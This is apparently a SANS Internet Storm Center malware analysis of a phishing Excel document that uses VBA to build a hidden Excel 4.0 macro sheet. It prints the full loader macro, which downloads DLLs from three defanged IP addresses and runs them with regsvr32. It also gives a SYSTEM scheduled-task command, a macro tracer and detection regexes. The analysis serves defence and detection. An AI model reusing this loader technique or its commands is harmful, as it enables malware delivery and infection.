Microsoft Excel supports two types of macros. The legacy format is known as "Excel 4.0 macros" (XLM) and the newer one (but already in use for a long time) is based on VBA. We have already covered both formats in many diaries[1][2]. Yesterday, I spotted an interesting sample that implements... both!
The malicious file was delivered through a classic phishing email and is called "Document_195004540-Copy.xls" (SHA256: 4f4e67dccb3dfc213fac91d34d53d83be9b9f97c0b75fbbce8a6d24f26549e14). The file was unknown on VirusTotal (VT) at the time of writing. It looks like a classic trap:
The document contains VBA code, as the "M" and "m" flags in the oledump.py stream listing show:
$ oledump.py Document_195004540-Copy.xls
  1:       103 '\x01CompObj'
  2:       240 '\x05DocumentSummaryInformation'
  3:       208 '\x05SummaryInformation'
  4:    180804 'Workbook'
  5:       597 '_VBA_PROJECT_CUR/PROJECT'
  6:       116 '_VBA_PROJECT_CUR/PROJECTwm'
  7:        97 '_VBA_PROJECT_CUR/UserForm1/\x01CompObj'
  8:       301 '_VBA_PROJECT_CUR/UserForm1/\x03VBFrame'
  9:       226 '_VBA_PROJECT_CUR/UserForm1/f'
 10:       272 '_VBA_PROJECT_CUR/UserForm1/o'
 11: M    3768 '_VBA_PROJECT_CUR/VBA/Module1'
 12: m     991 '_VBA_PROJECT_CUR/VBA/Sheet1'
 13: M    3010 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
 14: m    1195 '_VBA_PROJECT_CUR/VBA/UserForm1'
 15:      3860 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
 16:      2004 '_VBA_PROJECT_CUR/VBA/__SRP_0'
 17:       138 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 18:       212 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 19:       206 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 20:       864 '_VBA_PROJECT_CUR/VBA/dir'
Here is the interesting macro (stream 11, Module1; stream 13, ThisWorkbook, is also flagged "M" but is not shown here):
$ oledump.py Document_195004540-Copy.xls -s 11 -v
Attribute VB_Name = "Module1"
Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Sheet3"
    Sheets("Sheet3").Visible = False
    Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
    Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
    Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
    Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
    Sheets("Sheet3").Range("K17") = "=NOW()"
    Sheets("Sheet3").Range("K18") = ".dat"
    Sheets("Sheet3").Range("H35") = "=HALT()"
    Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
    Sheets("Sheet3").Range("I10") = UserForm1.Caption
    Sheets("Sheet3").Range("I11") = "JJCCBB"
    Sheets("Sheet3").Range("I12") = "Byukilos"
    Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
    Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
    Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
    Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
    Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
    Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
    Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
    Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
    Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
    Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
    Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
    Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
    Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
    On Error Resume Next
    Application.ScreenUpdating = True
    Application.DisplayAlerts = False
    Sheets("Sheet3").Delete
    Application.DisplayAlerts = True
End Sub
First, note the attacker's housekeeping: auto_open() creates a new hidden sheet ("Sheet3"), and auto_close() deletes it again when the document is closed (with DisplayAlerts switched off so the user is not prompted). The sheet only exists in memory while the document is open and never ends up in a saved copy of the file.
The magic line is this one:
Set Fera = Excel4IntlMacroSheets
See the Microsoft documentation[3]: Excel4IntlMacroSheets is the collection of the workbook's Excel 4.0 international macro sheets, and Add creates a new one. The VBA therefore creates a hidden XLM macro sheet, writes the macro into it cell by cell (in white font, so nothing would be visible even if the sheet were unhidden) and starts it with Application.Run on cell H1. The XLM interpreter runs a macro by walking down the column from the starting cell: empty cells and plain values are skipped, formulas are evaluated in order, and HALT() stops execution. Column H therefore executes REGISTER() in H9, three calls to the registered function in H10:H12, three EXEC() calls in H17:H19, and HALT() in H35. REGISTER() binds an exported function of a DLL (the DLL name comes from UserForm1.Label2.Caption, the export name from the form's caption) under the alias "Byukilos" with the type string "JJCCBB"; the alias is then called as Byukilos(0, URL, local path, 0, 0), which is the argument pattern of urlmon!URLDownloadToFileA. What does it do?
It tries to download the second-stage payload from three different URLs (into ..\Xertis.dll, ..\Xertis1.dll and ..\Xertis2.dll). The URL bases are stored in the UserForm labels; the file name is the value of =NOW() (cell K17, i.e. the Excel date serial, here 44461.9891568287 = 2021-09-22 23:44:23) followed by ".dat" (cell K18), so the path changes on every execution and only the hosts are usable as indicators:
hxxp://45[.]153[.]242[.]159/44461.9891568287.dat
hxxp://188[.]165[.]62[.]61/44461.9891568287.dat
hxxp://185[.]198[.]57[.]109/44461.9891568287.dat
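To see the Excel4 macro the way Excel sees it, it helps to replay the Range() assignments into a cell map and then walk column H like the XLM interpreter does. The following script is an added example, not part of the diary or of the sample: it parses the assignments from the VBA above, fills the UserForm captions from a dictionary (the diary does not print them; the three URL labels get the defanged hosts observed in the downloads, in the order the diary lists them, which is an assumption, and the DLL and export names are placeholders), resolves cell references, "&" concatenation and =NOW() (fixed to the serial seen in the URLs), maps the REGISTER() alias back to dll!export, and returns the list of calls up to HALT(). The column walk is a deliberately simplified model of XLM execution (no GOTO/IF handling), which is all this sample needs.

```python
import re
from datetime import datetime, timedelta

# Constructed input: the cell assignments from auto_open() above, copied verbatim
# (backslashes restored). Only the Range(...) = ... lines are needed.
VBA = r'''
Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
Sheets("Sheet3").Range("K17") = "=NOW()"
Sheets("Sheet3").Range("K18") = ".dat"
Sheets("Sheet3").Range("H35") = "=HALT()"
Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet3").Range("I10") = UserForm1.Caption
Sheets("Sheet3").Range("I11") = "JJCCBB"
Sheets("Sheet3").Range("I12") = "Byukilos"
Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
'''

# The UserForm captions are not printed in the diary. The three URL labels get the
# defanged hosts from the observed downloads (label-to-host order is an assumption);
# the DLL and export names held in Label2 and the form caption are placeholders.
FORM = {
    "UserForm1.Label1.Caption": "hxxp://45[.]153[.]242[.]159/",
    "UserForm1.Label3.Caption": "hxxp://188[.]165[.]62[.]61/",
    "UserForm1.Label4.Caption": "hxxp://185[.]198[.]57[.]109/",
    "UserForm1.Label2.Caption": "<dll from Label2>",        # placeholder
    "UserForm1.Caption": "<export from form caption>",     # placeholder
}

ASSIGN = re.compile(r'Sheets\("Sheet3"\)\.Range\("([A-Z]+\d+)"\)\s*=\s*(.+)')
REF = re.compile(r'[A-Z]{1,2}\d+')
CALL = re.compile(r'^=(\w+)\((.*)\)$')
EXCEL_EPOCH = datetime(1899, 12, 30)   # Excel day 0 once the 1900 leap-year bug is accounted for

def build_sheet(vba, form):
    """Replay the Range() assignments: returns {cell: value} as auto_open() leaves Sheet3."""
    sheet = {}
    for cell, rhs in ASSIGN.findall(vba):
        rhs = rhs.strip()
        sheet[cell] = rhs[1:-1] if rhs.startswith('"') else form[rhs]
    return sheet

def serial_to_datetime(serial):
    """Excel date serial (what =NOW() yields) to a datetime."""
    return EXCEL_EPOCH + timedelta(days=serial)

def resolve(arglist, sheet, now_serial):
    """Resolve an XLM argument list: cell references, & concatenation and =NOW()."""
    args = []
    for arg in arglist.split(','):
        parts = []
        for tok in arg.split('&'):
            tok = tok.strip()
            val = sheet.get(tok, '') if REF.fullmatch(tok) else tok
            if val == '=NOW()':                 # Excel concatenates NOW() as its serial
                val = format(now_serial, '.15g')
            parts.append(val)
        args.append(''.join(parts))
    return args

def trace_column(sheet, start='H1', now_serial=44461.9891568287, max_row=200):
    """Walk down a column the way the XLM interpreter does after Application.Run:
    value cells are skipped, formula cells execute in order, HALT() stops.
    Returns the resolved calls, with REGISTER() aliases mapped back to dll!export."""
    col = re.match(r'[A-Z]+', start).group()
    row = int(start[len(col):])
    registered, calls = {}, []
    while row <= max_row:
        m = CALL.match(sheet.get(f'{col}{row}', ''))
        row += 1
        if not m:
            continue
        name, args = m.group(1), resolve(m.group(2), sheet, now_serial)
        if name == 'REGISTER':                  # REGISTER(dll, export, types, alias, ...)
            registered[args[3]] = (args[0], args[1])
            calls.append(('REGISTER', args[0], args[1], args[2], args[3]))
        elif name in registered:
            dll, export = registered[name]
            calls.append((f'{dll}!{export}', *args))
        elif name == 'HALT':
            calls.append(('HALT',))
            break
        else:                                   # EXEC() and anything else
            calls.append((name, *args))
    return calls

if __name__ == '__main__':
    for call in trace_column(build_sheet(VBA, FORM)):
        print(call)
    print('NOW() serial seen in the URLs ->', serial_to_datetime(44461.9891568287))
```

The trace comes out as one REGISTER(), three download calls with the full URLs ending in 44461.9891568287.dat, three EXEC("regsvr32 -silent ..\Xertis*.dll") and a HALT(), which is the whole program hidden in the hidden sheet. The same approach (replay the VBA writes, then walk the column) is what you want when a sample starts using GOTO()/IF() in the XLM part: extend trace_column rather than reading the cells by hand.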
The downloaded file is called Xertis.dll (SHA256: b8b8895cdf37dba76f9966ec100ac85cc0f70dfd79f09a175454b5062d21c25d) and was again unknown on VT. It is a DLL that is loaded through regsvr32, which calls the DLL's DllRegisterServer export; the -silent switch suppresses the success/failure dialogs:
regsvr32 -silent ..\Xertis.dll
Persistence is implemented via a scheduled task:
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn wxhfetombc /tr "regsvr32.exe -s "C:\Users\user01\Xertis.dll"" /SC ONCE /Z /ST 23:45 /ET 23:57
Note the options: /RU "NT AUTHORITY\SYSTEM" runs the task as SYSTEM, /SC ONCE with /ST 23:45 fires it one minute after the time stamp embedded in the download URL, and /Z marks the task for deletion once it has expired (/ET 23:57). So this task is mostly a way to re-execute the DLL with SYSTEM privileges shortly after infection; it is not a long-lived persistence mechanism by itself.
Once I infected my lab, the following C2 traffic was generated:
It’s a Qakbot sample…
The VBA macro itself is not obfuscated, but building the Excel4 macro at runtime from VBA is a clever way to defeat many hunting rules: the saved file contains no XLM macro sheet and no =EXEC()/=REGISTER() formula in the Workbook stream, since Sheet3 exists only in memory while the document is open and is deleted on close. The strings are still visible in the decompressed VBA, though, so rules should look for Excel4MacroSheets/Excel4IntlMacroSheets, for XLM formulas written as string literals into cells, and for Application.Run on a Range.
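What such a hunting rule could look for is shown below as an added example (my own code, not from the diary and not a rule used by the ISC): it scores a decompressed VBA module on a handful of indicators that this sample exhibits, namely the Excel4 macro-sheet API, a hidden sheet, white font, XLM formulas written as string literals, Application.Run on a Range, regsvr32 and self-cleanup in auto_close(). The weights are my own choice; the two inputs are constructed, one an excerpt of the sample above and one a benign macro that also hides a sheet, to show the rule separates them.

```python
import re

# Indicators that a VBA project builds and runs an Excel 4.0 (XLM) macro at runtime.
# (name, regex, weight) - the weights are arbitrary, chosen for this example only.
INDICATORS = [
    ("xlm_sheet_api", r"Excel4(Intl)?MacroSheets|xlExcel4(Intl)?MacroSheet", 4),
    ("hidden_sheet",  r"\.Visible\s*=\s*(False|xlSheetVeryHidden|xlSheetHidden)", 2),
    ("white_font",    r"\.Font\.Color\s*=\s*vbWhite", 1),
    ("xlm_register",  r'"=REGISTER\(', 4),      # XLM formula stored as a string literal
    ("xlm_exec",      r'"=EXEC\(', 4),
    ("xlm_halt",      r'"=HALT\(', 1),
    ("run_range",     r"Application\.Run\s+Sheets\(.*\)\.Range\(", 3),
    ("regsvr32",      r"regsvr32(\.exe)?\s+-s", 2),
    ("self_cleanup",  r"Sub\s+auto_close.*?\.Delete", 2),
]

def hunt(vba_text):
    """Return (score, [matched indicator names]) for one decompressed VBA module."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, vba_text, re.IGNORECASE | re.DOTALL):
            hits.append(name)
            score += weight
    return score, hits

# Constructed input 1: an excerpt of the sample's Module1 (backslashes restored).
MALICIOUS = r'''
Sub auto_open()
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Sheet3"
    Sheets("Sheet3").Visible = False
    Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
    Sheets("Sheet3").Range("H35") = "=HALT()"
    Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
    Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
    Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
    Sheets("Sheet3").Delete
End Sub
'''

# Constructed input 2: a benign macro that also creates and hides a sheet.
BENIGN = r'''
Sub auto_open()
    Sheets.Add.Name = "Scratch"
    Sheets("Scratch").Visible = False
    Sheets("Scratch").Range("A1") = "=SUM(B1:B10)"
End Sub
'''

if __name__ == "__main__":
    print("sample :", hunt(MALICIOUS))
    print("benign :", hunt(BENIGN))
```

Run it over the output of oledump.py -s N -v (or olevba) for each "M" stream rather than over the raw OLE file: the patterns target decompressed VBA source, and the hidden-sheet indicator alone is not enough to alert on, which is why the benign case scores low.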
[1] https://isc.sans.edu/forums/diary/Maldoc+Excel+40+Macros/24750
[2] https://isc.sans.edu/forums/diary/VBA+Macro+Trying+to+Alter+the+Application+Menus/27068
[3] https://docs.microsoft.com/en-us/office/vba/api/excel.application.excel4intlmacrosheets
Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.